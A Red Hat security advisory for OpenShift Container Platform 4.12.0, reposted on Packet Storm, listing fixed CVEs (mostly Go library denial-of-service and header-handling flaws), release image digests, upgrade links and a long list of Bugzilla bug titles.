Security
Headlines
HeadlinesLatestCVEs

Headline

Red Hat Security Advisory 2022-7399-01

Red Hat Security Advisory 2022-7399-01 - Red Hat OpenShift Container Platform is Red Hat’s cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.12.0. Issues addressed include denial of service, memory leak, and out of bounds read vulnerabilities.

Packet Storm
#vulnerability#web#ios#mac#windows#linux#red_hat#dos#js#git#java#kubernetes#perl#ldap#vmware#aws#lenovo#amd#bios#alibaba#oauth#auth#ssh#ibm#rpm#docker#jira#firefox#sap#ssl
-----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256=====================================================================                   Red Hat Security AdvisorySynopsis:          Moderate: OpenShift Container Platform 4.12.0 bug fix and security updateAdvisory ID:       RHSA-2022:7399-01Product:           Red Hat OpenShift EnterpriseAdvisory URL:      https://access.redhat.com/errata/RHSA-2022:7399Issue date:        2023-01-17CVE Names:         CVE-2021-4235 CVE-2021-22570 CVE-2021-38561                    CVE-2022-1705 CVE-2022-2879 CVE-2022-2880                    CVE-2022-2995 CVE-2022-3162 CVE-2022-3172                    CVE-2022-3259 CVE-2022-3466 CVE-2022-21698                    CVE-2022-24302 CVE-2022-27664 CVE-2022-30631                    CVE-2022-32148 CVE-2022-32189 CVE-2022-32190                    CVE-2022-41316 CVE-2022-41715 CVE-2022-42010                    CVE-2022-42011 CVE-2022-42012 CVE-2022-42898                    CVE-2023-0296 =====================================================================1. Summary:Red Hat OpenShift Container Platform release 4.12.0 is now available withupdates to packages and images that fix several bugs and add enhancements.This release includes a security update for Red Hat OpenShift ContainerPlatform 4.12.Red Hat Product Security has rated this update as having a security impactof Moderate. A Common Vulnerability Scoring System (CVSS) base score, whichgives a detailed severity rating, is available for each vulnerability fromthe CVE link(s) in the References section.2. Description:Red Hat OpenShift Container Platform is Red Hat's cloud computingKubernetes application platform solution designed for on-premise or privatecloud deployments.This advisory contains the container images for Red Hat OpenShift ContainerPlatform 4.12.0. 
See the following advisory for the RPM packages for thisrelease:https://access.redhat.com/errata/RHSA-2022:7398Space precludes documenting all of the container images in this advisory.See the following Release Notes documentation, which will be updatedshortly for this release, for details about these changes:https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.htmlSecurity Fix(es):* golang: out-of-bounds read in golang.org/x/text/language leads to DoS(CVE-2021-38561)* golang: net/http: improper sanitization of Transfer-Encoding header(CVE-2022-1705)* golang: archive/tar: unbounded memory consumption when reading headers(CVE-2022-2879)* golang: net/http/httputil: ReverseProxy should not forward unparseablequery parameters (CVE-2022-2880)* prometheus/client_golang: Denial of service usingInstrumentHandlerCounter (CVE-2022-21698)* golang: net/http/httputil: NewSingleHostReverseProxy - omitX-Forwarded-For not working (CVE-2022-32148)* golang: net/url: JoinPath does not strip relative path components in allcircumstances (CVE-2022-32190)* vault: insufficient certificate revocation list checking (CVE-2022-41316)* golang: regexp/syntax: limit memory used by parsing regexps(CVE-2022-41715)* openshift: etcd grpc-proxy vulnerable to The Birthday attack against64-bit block cipher (CVE-2023-0296)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage(s)listed in the References section.3. 
Solution:See the following documentation, which will be updated shortly for thisrelease, for important instructions on how to upgrade your cluster andfully apply this asynchronous errata update:https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.htmlYou may download the oc tool and use it to inspect release image metadatafor x86_64, s390x, ppc64le, aarch64 architectures.The image digests may be found athttps://quay.io/repository/openshift-release-dev/ocp-release?tab=tagsThe sha values for the release are:(For x86_64 architecture)The image digest issha256:4c5a7e26d707780be6466ddc9591865beb2e3baa5556432d23e8d57966a2dd18(For s390x architecture)The image digest issha256:ab70750be4fadf5a525141ae32a8577c91dd19f1d6e582a6824339c938216ec0(For ppc64le architecture)The image digest issha256:5a5943dea60b40f73ecee685b12fff1d65cc8bfe946f762fdfe862969483ddbb(For aarch64 architecture)The image digest issha256:cb34667519d1cfd8eedf0fb27e14b7b7e6209323b86977bfaadf91da012d179dAll OpenShift Container Platform 4.12 users are advised to upgrade to theseupdated packages and images when they are available in the appropriaterelease channel. To check for available updates, use the OpenShift Consoleor the CLI oc command. Instructions for upgrading a cluster are availableathttps://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html4. 
Bugs fixed (https://bugzilla.redhat.com/):1843043 - Config api resource has a terrible description1876933 - No useful message after hitting volume attachment limit1879980 - oc adm groups prune  cannot find the groups present in ldap and finishes to delete all of them1894268 - SDN to OVN migration problem due to overlap with "Join network"1896533 - network operator degraded due to additionalNetwork in non-existent namespace1904106 - Graphs in dev console shouldn't go below 01917662 - oc exec cmd run executed file in azure file volume return 139 or exec failed: container_linux.go:366: starting container process caused: interrupted system call1924017 - [OCPonRHV] [Workers only] Special configuration for High Performance VMs is not implemented for worker nodes1944065 - [VPA] recommender is logging errors for pods with init containers1944365 - openstack: missing validation for apiVIP and ingressVIP1951835 - CVO should propagate ClusterOperator's Degraded to ClusterVersion's Failing during install1951901 - incorrect Worker nodes number calculated when nodes have both master and worker role1957709 - Creation of LoadBalancer service (Openstack Lbaas) take too much to be ready when creating IngressControllers with endpointPublishingStrategy=LoadBalancerService1962502 - The route generated from ingress is still admitted after updating the spec.ingressClassName to mismatch1977660 - the pod events show error codes when crio recreate the missing symlinks1997396 - No alerts have triggered for CPU and Memory limit with Cluster Autoscaler2000276 - EncryptionStateControllerDegraded: failed to get converged static pod revision2000552 - must-gather should collect ALL apiservices2000554 - must-gather should collect webhooks service namespaces2001027 - ClusterAutoscaler with balanceSimilarNodeGroups does not scale even across MachineSet2001211 - Resource usage measurement data display the concatenation of English and translation sentence fragments on utilization section  when moving 
the mouse over each resource usage chart in Developer->Project2001409 - All critical alerts should have links to a runbook2006378 - improve check that verifies task permissions in vsphere2006611 - CVO resolves the version takes a long time sometimes when upgrading via `--to-image`2010365 - OpenShift Alerting Rules Style-Guide Compliance2010375 - OpenShift Alerting Rules Style-Guide Compliance2018481 - [osp][octavia lb] Route shard not consistently served in a LoadBalancerService type IngressController2021297 - Dynamic Plugins: Console isn't honoring declared `@console/pluginAPI` dependency2022328 - kube-controller unpublishing volume after maxWaitForUnmountDuration leaves block devices on node in a inconsistent state2023443 - Console plugin SDK build passes even if there are errors in one of its dist packages2028474 - [OCPonRHV] Remove clustername length limitation(metadata name)2030406 - Dynamic plugin demo nav outputs incorrect markup that doesn't conform to the Console navigation which uses the PatternFly Navigation component2033167 - oc extract ?to option doesn?t create the target directory if it?s not present2033499 - Populate acceptedRisks on Recommended=False updates for conditional edges2034883 - MCO does not sync kubeAPIServerServingCAData to controllerconfig if there are not ready nodes2037329 - [UI] MultiClusterHub details after it's creation starts flickers, disappears and appears back (happened twice)2039411 - Monitoring operator reports unavailable=true while one Prometheus pod is ready2040612 - crio umask sometimes set to 00002043518 - Better message in the CMO degraded/unavailable conditions when pods can't be scheduled2045880 - CVE-2022-21698 prometheus/client_golang: Denial of service using InstrumentHandlerCounter2046335 - ETCD Operator goes degraded when a second internal node ip is added2048349 - Service CA Operator does not reconcile for spec.loglevel changes in ServiceCA CRD2048789 - broken toolbox in OCP 4.10 with non-default image2049591 - 
[RFE] Toolbox - make sure we are running on the latest image?2052662 - Opening Insights popup crashes the page2055247 - [Azure] Fail to create master nodes with dcasv5 /dcadsv5 -series Confidential Virtual Machine2055620 - ImageStreamChange triggers using annotations does not work2056387 - [IPI on Alibabacloud][RHEL scaleup] new RHEL worker were not added into the backend of Ingress SLB automatically2056888 - [Secondary Scheduler] - Version number incorrect in secondary scheduler operator bundle2057637 - default VolumeSnapshotClass created by the csi-driver-manila-operator does not contain secrets2057972 - Extra space is in the translation text(Chinese) of 'Create rolebinding' and 'replicate rolebinding'2059125 - The oc binary for mac arm64 can?t be executed2059599 - [ibm]Lots of info message from ibmcsidriver/identity.go:83 displayed in the log ibm-vpc-block-csi-node/iks-vpc-block-node-driver2060068 - machine-api-provider-aws creates EC2 instances with the default security group when no matching security group is found2060079 - Re-think kubeproxy_sync_proxy_rules_duration_seconds_bucket alerts2061947 - IBM Cloud: Uninstall does not succeed when there is nothing to clean up2062579 - [IBMCloud] Provide invalid profile machine stuck in "Provisioning" phase2063764 - Operators - OperatorHub : i18n misses2065192 - GCP - Less privileged service accounts are created with Service Account User role2065727 - Scaling down an hypershift cluster ends with BMH shutdown and in maintenance mode2066560 - two router pods are in ContainerCreating status when tried to patch ingress-operator with custom error code pages directly2067059 - No topologySpreadConstraints shown in `oc describe resource`2067323 - [sig-network-edge][Conformance][Area:Networking][Feature:Router] The HAProxy router should pass the gRPC interoperability tests [Suite:openshift/conformance/parallel/minimal]2068910 - After node re-created, some ovn annotations are not found for the node and due to that pod is in 
crashloop2070562 - Base64 data value for  java keystore secret changing automatically, when we edit it from the console and saving it without doing any changes2071792 - Non-kubeadmin user will not have access to openshift-config ns to pull secret/CM for adding private HCR in a namespace2073617 - [IBM] allowedTopologies in SC causes scheduling to fail when region is empty2075107 - Heading mismatch of CloudShellDrawer & Fullscreen2075607 - [4.10] IBM VPC operator needs e2e csi tests for ibmcloud2077933 - Kube controller manager does not handle new configurations available in the cloud provider OpenStack2078691 - [OVN] Node to service traffic is blocked if service is "internalTrafficPolicy: Local" even backed pod is on the same node2078727 - [IBM] Volume is not provisioned when storageclass Region is provided but without zone info2079214 - modal text goes outside of modal boundary and doesn't have scroll bar2079249 - list pages in pipelines is taking more time to load when there are too many items2079679 - [bz-monitoring][invariant] alert/Watchdog must have no gaps or changes2079690 - [RH OCP 4.9] Affinity definition YAML shows difference in web console2080260 - 404 not found when create Image Manifest Vulnerability on Operator "Container Security"2080449 - [Azure-file CSI Driver] Read/Write permission denied for non-admin user on azure file csi provisioned volume with fsType=ext4,ext3,ext2,xfs2081674 - Developer add page create a new project modal redirects to admin project page after creation2081734 - metal3-dnsmasq: workers are not provisioned during the cluster installation when BootMacAddress is not provided lower-case2082395 - Private cluster installer on Azure asking for baseDomainResourceGroup even when it has nothing to do with basedomain as mentioned in documentation.2082588 - [RFE] Add new Azure instance types to the official "tested/supported" list2082599 - retry logic should have an upper bound on the number of failed attempts2082773 - 
[AWS-EBS-CSI-driver-Operator] Generic ephemeral volumes online resize Filesystem type volume stucked at file system resize phase2083041 - Updating externalTrafficPolicy=cluster to externalTrafficPolicy=local doesn't work2083226 - alertmanager-main pods failing to start due to startupprobe timeout2084453 - Edit PodDisruptionBudget page sometimes takes user to not synced YAML view2084471 - Capital letters in install-config.yaml .platform.baremetal.hosts[].name cause bootkube errors2084504 - can not silent platform alert from developer console2085390 - machine-controller is case sensitive which can lead to false/positive errors2086231 - Install Shared Resource CSI Driver Webhook2086887 - DNS occasionally unavailable after large scale up operation2087032 - Operator-sdk "run bundle" "run bundleup-grade" can't support proxy env2087679 - EgressQoSes not gathered for debugging purposes2087981 - PowerOnVM_Task is deprecated use PowerOnMultiVM_Task for DRS ClusterRecommendation2088033 - Clear text password/secret in operator pod2088583 - libguestfs: error: download: /boot/loader/entries/ostree-1-rhcos.conf: No such file or directory2089199 - etcd Dashboard should be removed on guest cluster of hypershift2089221 - Could not de-select a Git Secret in add and edit forms2089402 - BuildConfig throws error when using a label with a / in it2089807 - Many errors when powering off a master2089950 - Upgrade fails with message Cluster operator console is not available2090135 - [upstream] Operator-sdk run bundle offer the wrong error message2090836 - Bootstrap node should honor http proxy2090988 - ReplicaSet prometheus-operator-admission-webhook has timed out progressing2091102 - Name of workload get changed, when project and image stream gets changed on edit deployment page of the workload.2091109 - Add to application dropdown options are not visible on application-grouping sidebar action dropdown.2091238 - NetworkPolicies: ovnkube-master pods crashing due to panic: "invalid memory 
address or nil pointer dereference"2091545 - Namespace value is missing on the list when selecting "All namespaces" for operators2091555 - Sort function doesn't work on "Namespaces" column on  operator details page2091573 - Input values in Instantiate Template are disappeared randomly in the developer console2091864 - Registry Pod don't have "securityContext.runAsNonRoot=true" config that generated by run bundle2092319 - [Firefox] multi-line node status formatting issue2092731 - Give more clear information  when `oc adm release new` without the --keep-manifest-list opotion  for the manifestlist imagestream YAML2092920 - Dependent tasks in Pipeline chart linked incorrectly2093016 - [azure disk] add metric and alert to help identify cascading test failures2093040 - unable to start `toolbox` on RHCOS using `podman` 4.02093046 - must-gather debug pods are missing priority class2093440 - [sig-arch][Early] Managed cluster should start all core operators  - NodeCADaemonControllerDegraded: failed to update object2093826 - Pods with OVN hardware offloading enabled interface fail to start2093852 - Affinity rule created in console deployment for single-replica infrastructure2093892 - no api_key_file field in AlertmanagerConfig, but error message complains it2094012 - Listing secrets in all namespaces with a specific labelSelector does not work properly2094068 - No runbook created for NorthboundStale alert2094101 - `podman` dumping core on RHCOS 4.11 + RHEL 8.6 on `aarch64`2094174 - ReleaseAccepted=False keeps complaining about the update cannot be verified after the upgrade is cleared2094240 - MachineConfigPool details page should use consistent word for resume updating2094362 - Duplicate prometheus rules for API SLOs after upgrade2094462 - DeleteACLsFromPortGroupOps doesn't actually have any UUIDs set, so it deletes nothing and complains2094502 - Creating an MCH instance does not work via blue button2094558 - MetalLB: Creating ip address pool and community CR through 
webconsole the words like addresses and communities are truncated2094716 - Unable to install a fully air gapped OCP 4.10 cluster in AWS using IPI2094783 - storageclass should not be created for unsupported vsphere version2094865 - INIT container stuck forever2095323 - Openshift on OpenStack does not honor machineNetwork setting with multiple networks2095623 - [rebase v1.24]  [sig-storage] In-tree Volumes [Driver: azure-file] tests fail2095708 - oc adm inspect throws out erorr "the server doesn't have a resource type "egressfirewalls" for all operators2095852 - Unable to create Network Policies: error: unexpectedly found multiple equivalent ACLs (arp v/s arp||nd) (ns_netpol1 v/s ns_netpol2)2097026 - Administration - Cluster Settings - Cluster Operators : Filter menu values are in English2097073 - etcdExcessiveDatabaseGrowth should not use increase() around gauge metrics2097221 - [OVN HWOL] Avoid masked access to ct_label to allow offloading of ECMP symmetric reply and load balanced traffic2097243 - NodeIP is used instead of EgressIP2097431 - Degraded=True noise with: UpgradeBackupControllerDegraded: unable to retrieve cluster version, no completed update was found in cluster version status history2097557 - can not upgrade. 
Incorrect reading of olm.maxOpenShiftVersion2097691 - [vsphere] failed to create cluster if datacenter is embedded in a Folder2097701 - MetaLLB: Validation  unable to create BGPPeers with spec.peerASN  Value in OCP 4.102097785 - Ensure OSUpdateStaged gets sent to the API server before rebooting2098053 - Add a e2e test to validate address mismatch between pod address family and external gw family2098054 - The control plane should tag AWS security groups at creation2098072 - [vsphere] update install-config description for diskType2098124 - [Kubernetes] [ISCSI] ipv6 single stack cluster could not get SCSI server host number2098234 - Local Update Server link 4042098299 - install-config: Strict unmarshalling conflicts with new fields2099401 - [IBMCloud] Client does not set region endpoint for InstallConfig2099664 - MachineConfigPool is not getting updated2099795 - README file for helm charts coded in Chinese shows messy characters when viewing in developer perspective.2099864 - vmware-vsphere-csi-driver-controller can't use host port error on e2e-vsphere-serial2099939 - enabled UWM alertmanager only, user project AlertmanagerConfig is not loaded to UWM alertmanager or platform alertmanager2099945 - [OVN] bonding fails after active-backup fail-over and reboot,  kargs static IP2099991 - pass the "--quiet" option via the buildconfig for s2i2100166 - heterogeneous arch: oc adm extract encodes arch specific release payload pullspec rather than the manifestlisted pullspec2100220 - Completed pods may not be correctly cleaned up2100249 - Revert Bug 2082599: add upper bound to number of failed attempts2100312 - should use the same value for AlertRelabelConfig with oc explain2100334 - Event sources do not show up until KnativeServing is installed2100342 - Operator-sdk run bundle offer the wrong error message2100472 - TechPreview feature is not enabled, but find "failed to list *v1alpha1.AlertingRule: alertingrules.monitoring.openshift.io is forbidden" in cmo logs2100495 - 
CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS2100640 - "Show operands in all namespaces" radio group font size is too large.2100702 - No need to pass to-image-base for `oc adm release new` command when use --from-release2100708 - Print the dup choose image message is noisy2100774 - In the Deploy Image form Image name from external registry field Required text is not red as other fields2100843 - Selecting add connector context menu option opens the side panel of the node2100845 - MetalLB:  matchExpressions used in CR like L2Advertisement allow duplicate entries2100852 - worker-user-data secret couldn't be synced up from openshift-mahcine-api to openshift-cluster-api2100860 - Users can't silence alerts from the dev console when dedicated UWM Alertmanager is deployed2100882 - downloading govc is impacted by github rate limiting2100918 - Add debug logging to TestIngressOperatorCacheIsNotGlobal2100923 - [SSO] Deleting secondary scheduler CR does not delete the corresponding deployment2101157 - OVS-Configure doesn't iterate connection names containing spaces correctly2101343 - topolvm-controller get into CrashLoopBackOff few minutes after install2101357 - catalog-operator fatal error: concurrent map writes2101444 - kube-apiserver-operator should raise an alert when there is a Pod Security admission violation2101511 - [4.12] Tag new ironic packages when we have builds2101520 - csi-snapshot-controller-operator occasionally establishes an unusual number of watch requests2101622 - Drain happens before other image-registry pod is ready to service requests, causing disruption2101645 - [Cluster storage Operator] DefaultStorageClassController report fake message "No default StorageClass for this platform" on azure and openstack2101736 - Finalizers can't be removed for machines2101843 - pv fails to recycle with PodSecurity error2101878 - Route status isn't always getting cleared with routeSelector updates2101880 - 
[cloud-credential-operator]container has runAsNonRoot and image will run as root2101885 - The bash completion doesn't work for get subcommand2101992 - [Azure] IP address release: After deleting and recreating egressIP object, egress traffic was intermittently broke for about 1 minute2102004 - 4.10 to 4.11 update: Degraded node: unexpected on-disk state: mode mismatch for file: "/etc/crio/crio.conf.d/01-ctrcfg-pidsLimit"; expected: -rw-r--r--/420/0644; received: ----------/0/02102098 - [OSD] There is no error message shown on node label edit modal2102109 - co/node-tuning: Waiting for 15/72 Profiles to be applied2102228 - Update rhcos.json in installer to point at new CDN2102269 - The base image is still 4.10 for operator-sdk2102324 - GCP: Panic when unknown region AND machinesets specified in install config2102341 - [UI] ODF operator icon is missing on the Installed Operators page2102344 - [SSO] sso operator cannot be upgraded from 1.0.0 to 1.0.1 or 1.12102371 - Openshift-Ansible RHEL 8 CI update2102383 - Kube controllers crash when nodes are shut off in OpenStack2102450 - Kernel parm needs to be added when a pao performance profile is applied, rcutree.kthread_prio=112102632 - a shorter cluster name leads to Uninstall fails with Observed a panic: runtime.boundsError2102673 - FRR start race condition2102676 - Updates / config metrics are not available in 4.112102766 - OCP 4.12 Using RHCOS 411.842103061 - [4.12] Backport Prow CI improvements from master2103090 - Storage - StorageClasses - Create StorageClass - Provisioner: Upon selection of Provisoner i18n misses2103126 - must-gather namespace should have ?privileged? 
warn and audit pod security labels besides enforce2103144 - [IPv6] apiVIP and ingressVIP non-equality validation doesn't account for synonyms2103178 - disabling ipv6 router advertisements using "all" does not disable it on secondary interfaces2103224 - Sidebar perspective dropdown switcher has different background color and incorrect border color when in dark theme mode2103236 - GCP: Error message for insufficient permissions needs to be improved2103283 - In CI 4.10 HAProxy must-gather takes longer than 10 minutes2103590 - [HyperShift] Election timeouts on OVNKube masters for Hypershift guests post statefulset recreation2103668 - ovnkube-node pod fails to start - unable to add OVN masquerade route to host, error: failed to add route for subnet - after upgrading to 4.102103680 - Setting disableNetworkDiagnostics: true does not persist when network-operator pod gets re-created2103725 - Carry HAProxy patch 'BUG/MEDIUM: h2: match absolute-path not path-absolute for :path'2103786 - MCP upgrades can stall waiting for master node reboots since MCC no longer gets drained2103940 - kube-controller-manager operator 4.11.0-rc.0 degraded on disabled monitoring stack2103972 - Pipelines (Multi-column table) column titles are not aligned with the column content (input fields) starting with 4.92103981 - Topology resource sidebar shows all Builds and should show just the last n2104275 - Supermicro server FirmwareSchema CR does not contain allowable_values, attribute_type and read_only flag2104337 - Remove `yq` curls from CI steps2104373 - [AWS] CCM cannot work on Commercial Cloud Services (C2S) Top Secret Region2104481 - PROXY protocol is not configurable for "private" endpoint publishing strategy2104503 - Update ose-machine-config-operator images to be consistent with ART2104549 - telemeter golangci-lint outdated blocking ART PRs that update to Go1.182104578 - Installer creates unnecessary master_ingress_cluster_policy_controller security group rule2104619 - Upgrade from 4.11.0-rc0 
-> 4.11.0-rc.1 failed. rpm-ostree status shows No space left on device2104642 - Add a validation webhook for Nutanix machine provider spec in Machine API Operator2104784 - Some EgressIP was not correctly assigned to the egress node under some condition2104803 - lr-policy-list for EgressIP was lost after scale down the test pods2104953 - Reintroduce kube1.24 for SDN2105003 - e2e-metal-ipi-ovn-dualstack failure: Timed out waiting for node count (5) to equal or exceed machine count (6).2105045 - OLM updates namespace labels even if they haven't changed2105071 - container-selinux: Mostly-confined containers which create their own user and mount namespaces can't mount overlay filesystems2105123 - Tuned overwriting IRQBALANCE_BANNED_CPUS2105165 - [IPI-IBMCloud] explain installconfig.platform.ibmcloud.resourceGroupName need update2105303 - Specify the namespace and the index entry along with the chart url to get the chart details2105325 - [oc adm release] extraction of the installer against a manifestlisted payload referenced by tag leads to a bad release image reference2105328 - crud/other-routes.spec.ts Cypress test failing at a high rate in CI2105341 - Bootstrap Gather Fails when cluster.tfvars.json is not available in Azure2105344 - Console app pod action provider extension is incorrectly defined2105399 - [SSO] secondary scheduler CR instance does not get updated when SSO is upgraded from 1.0.1 to 1.1.02105706 - Race condition with pendingCloudPrivateIPConfigsOps in EgressIP code2105909 - OLM create-namespace.spec.ts e2e test fails always2105918 - Install Helm chart form doesn't allow the user select a specific version2105933 - OKD: update FCOS to latest stable2105967 - Add E2E test case for Telco Friendly workload specific API2105996 - Broken assign error display for cloudprivateipconfig2106044 - etcd backup seems to not be triggered in 4.10.18-->4.10.20 upgrade2106055 - vSphere defaults to SecureBoot on; breaks installation of out-of-tree drivers2106061 - [4.12] 
Bootimage bump tracker
2106086 - IngressController spec.tuningOptions.healthCheckInterval validation allows invalid values such as "0abc"
2106298 - unix domain socket mode is broken when specified as ovn database transport method
2106366 - ProjectHelmChartRepository form doesn't allow the user to make a difference between name and displayname
2106372 - TypeError while creating NodeObservability Run under NodeObservability Operator
2106377 - ProjectHelmChartRepository display name (spec.name) is not used in Helm Charts catalog
2106378 - Spoke BMH stuck "provisioning" after changing a BIOS attribute via the converged workflow
2106403 - Nutanix: the e2e-nutanix-operator webhooks test suite does not support provider Nutanix
2106444 - EgressnodeIP update need special logic to handle creation errors
2106449 - openshift4/ose-operator-registry image is vulnerable to multiple CVEs
2106476 - Order of config attributes are not maintained during conversion of PT4l from ptpconfig to ptp4l.0.config file
2106667 - UPI: Install playbooks don't honour platform.openstack.externalDNS
2106733 - Machine Controller stuck with Terminated Instances while Provisioning on AWS
2106770 - metallb greenwave tests failure
2106803 - E2E: intermittent failure is seen on tests for devfile
2106805 - Spec flag not overriding defaults in headless cypress tests
2106862 - After ovnkube-node restart, external traffic policy local no longer works
2106866 - Test Flake - Using OLM descriptor components successfully creates operand using form
2106935 - kubernetes-nmstate-operator fails to install with error "no channel heads (entries not replaced by another entry) found in channel"
2107043 - HTTPS_PROXY ENV missing in some CSI driver operators
2107068 - etcd-metrics container is flooding logs
2107113 - Adding SSH keys for core user post-install creates .ssh folder owned by root
2107178 - Bond CNI: Failed to recreate pod with active-active bond: Failed to attached links to bond: Failed to set link: net2 MASTER, master index used: 4, error: bad address
2107241 - [OCPonRHV] CSI provisioned disks are effectively preallocated due to go-ovirt-client setting Provisioned and Initial size of the disk to the same value
2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header
2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working
2107469 - Confusing subtitle in Create Service Binding modal when the target is already known
2107513 - [SSO] 1.0.1 csv is pulling in secondary-scheduler-operator-container-v1.1-5
2107558 - When deploying via the web ui, the namespace is always openshift-operators
2107566 - [GCP] create gcpcluster get error
2107578 - Power VS machine Processor is always defaulted to 0.5
2107999 - [GCP] capg-controller-manager report panic after creating machineset and machine stuck in Provisioning
2108033 - remove ovn-kubernetes dependency on arping executable file
2108054 - Report alert when upstream CSI driver is found
2108222 - Missing spec.cpu.offlined field in v1 API
2108307 - oc debug node should set hostIPC to true
2108317 - Fix two issues in hybrid overlay
2108320 - rpm-ostreed: start limit hit easily
2108473 - [vSphere CSI driver operator] CSI controller pod restarting constantly
2108551 - [CI Watcher] Bulk Import e2e test flaking at a high rate
2108647 - [azure] Standard_D2s_v3 as worker failed by "accelerated networking not supported on instance type"
2108708 - Ingress operator creates a "default" ingresscontroller on HyperShift
2108858 - cluster-version operator should clear (pod) securityContext when the manifest does not set the property
2109045 - ovn-k needs kubernetes 1.24 bump
2109056 - Bring avoidbuggyips back
2109059 - Reply to arp requests on interfaces with no ip
2109152 - Kube-apiserver was down and could not recover
2109258 - Legacy machine deletion annotation is not respected
2109374 - ClusterVersion availableUpdates is stale: PromQL conditional risks vs. slow/stuck Thanos
2109388 - [AWS] s3 GetBucketPolicy permission is missing in installer validation
2109469 - Code cleanup: Don't call useServiceLevelTitle hook in the JSX
2109502 - Prerelease report bug link should be updated to JIRA instead of Bugzilla
2109511 - Failed PipelineRun logs text is not visible in light mode
2109538 - Nutanix platform validations run at `create manifests` stage
2109697 - Migrate openshift-ansible to ansible-core
2109800 - [IBMCloud] context deadline exceeded for kube-scheduler targets
2109854 - Max unavailable and Max surge have inaccurate description
2109945 - HyperShift: ovnkube-node not able to connect to sbdb
2109963 - Master node in SchedulingDisabled after upgrade from 4.10.24 -> 4.11.0-rc.4
2109965 - oci hook Low-latency-hooks causing high container creation times under platform cpu load
2109967 - failed to apply dns nncp on vSphere/OpenStack platform
2110281 - daemon: Drop tuneableFCOSArgsAllowlist
2110321 - Workloads list page has different PDB action items from details page when All Projects selected
2110501 - [Upgrade]deployment openshift-machine-api/machine-api-operator has a replica failure FailedCreate
2110525 - Form/YAML form errors stay around
2110590 - Upgrade failing because restrictive scc is injected into version pod
2110617 - Split the route controllers out from OCM
2110629 - openshift-controller-manager(-operator) namespace should clear run-level annotations
2110722 - openshift-tests: allow -f to match tests for any test suite
2110927 - Edit YAML page shows unexpected zero (0) and doesn't clear errors anymore
2111151 - Cannot delete a Machine if a VM got stuck in ERROR
2111165 - Project auth cache is fully invalidated on changes to namespaces and namespaced RBAC
2111205 - console-plugin-demo build failing in CI
2111467 - Node internal DNS address is not set for machine
2111474 - Fetch internal IPs of vms from dhcp server
2111534 - [OVNK] Conntrack Rules are removed before the service rules/flows
2111537 - oc image info ignores --output for multiarch image
2111586 - Export OVS metrics
2111686 - [OKD/nanokube] Different NPE when using console with a nanokube cluster
2111733 - pod cannot access kubernetes service
2111817 - rpm-ostreed start timeout on nodes with medium/high load
2111842 - vSphere test failure: [Serial] [sig-auth][Feature:OAuthServer] [RequestHeaders] [IdP] test RequestHeaders IdP [Suite:openshift/conformance/serial]
2111878 - Azure EgressIP gives up reconciling with No matching nodes found when updating the same egressip consecutively
2111972 - openshift-machine-api namespace runlevel label should be set to empty string
2111979 - openshift-controller-manager-operator NS runlevel needs to be set to emptystring
2111984 - OpenShift controller manager needs permissions to get/create/update leases for leader election
2112086 - [hybrid-overlay] AWS EC2 metadata service not available in host's vNIC for Windows
2112146 - [CI watcher] Create pod sample fail because of a restricted pod security admission policy
2112237 - [ Cluster storage Operator 4.x(10/11/12) ] DefaultStorageClassController report fake message "No default StorageClass for this platform" on Alicloud, IBM, Nutanix
2112481 - Synced editor forms have incorrect and inconsistent visual display
2112812 - [OCP 4.10] Developer catalog fails to load (on a fully disconnected cluster and on a disconnected cluster with proxy)
2112862 - Namespace CRUD integration test is failing
2112934 - The oc adm inspect ns/[namespace_name] command is not collecting the servicemonitors in the namespace
2113936 - Fix e2e tests for [reboots][machine_config_labels] (tsc=nowatchdog)
2113977 - Fix pod stuck in termination state when mount fails or gets skipped after kubelet restart
2114009 - [4.12 Alicloud Snapshot] taking more time(4min+) to make snapshot content with ready status and (volume/snapshot content) getting created in default Resource group id
2114488 - Monitoring Alert decorator in Topology color is grey instead of red
2114506 - olm e2e failing when capabilities are disabled
2114721 - telemeter-client pod does not use the updated pull secret when it is changed
2114754 - "gather bootstrap" creates unexpected folder "serial-log-bundle-<timestamp>" beyond "log-bundle-<timestamp>.tar.gz"
2114779 - Node Tuning Operator(NTO) - OCP upgrade failed due to node-tuning CO still progressing
2114834 - Failure when creating Floating IP for load-balancer
2114968 - 4.12-nightly payloads blocked by metal jobs failing with "Still creating ..." when creating nodes
2115308 - Kube API server operator should not update replicas when Machine/Node is being removed
2115347 - 03279843 | Sev 3 | Negative regex matchers for alertmanager silences not properly parsed or read by console
2115358 - control-plane-machine-set-operator pod got panic when create cpms on a single zone deployment
2115479 - ovnkube direct-lists pods on a node when the node object changes
2115522 - Strange padding in new Helm Chart Repository table row
2115527 - ServiceAccounts PATCH noise leads to Secret leakage
2115528 - bump bootimage to include latest rpm-ostree
2115638 - CPMS cannot trigger RollingUpdate when adding failure domain
2115684 - Gather ODF CephCluster resource status
2115790 - [4.12] Bootimage bump tracker
2115799 - CI failing tests: Perform actions on knative service and revision knative service menu options
2115802 - Minor test fixes related to getting updated profile and checking kubeletconfiguration
2115814 - Issues with samples in a disconnected cluster in OCP 4.9
2115899 - BuildConfig form: Docker image repository should be just called Image registry
2116382 - Setting a telemeter proxy in the cluster-monitoring-config config map does not work as expected
2116415 - CI failing tests: Event tab in build details page
2116460 - percpu Memory leak CRIO due to no garbage collection in /run/crio/exits for exited containers
2116547 - phyc2sys config will be automatically added to ptpconfigs even if it is not included in user PGT
2116715 - remove dead code from openshift-controller-manager
2116973 - Multiple navigation items displaying as active
2116982 - multus-admission-controller in openshift-multus has 2 replicas on SNO
2117033 - Cluster-version operator ClusterOperator checks are unecessarily slow on update
2117142 - Update the permission for Project Helm Chart Repository
2117235 - separate route controllers to a new command
2117255 - Failed to dump flows for flow sync, stderr: "ovs-ofctl: br-ext is not a bridge or a socket"
2117310 - [OVN] New pods unable to establish TCP connections and get constant timeouts causing application downtime
2117387 - vsphere: installer for vsphere does not have steal clock accounting enabled
2117423 - Backport: https://github.com/openshift/kubernetes/pull/1295
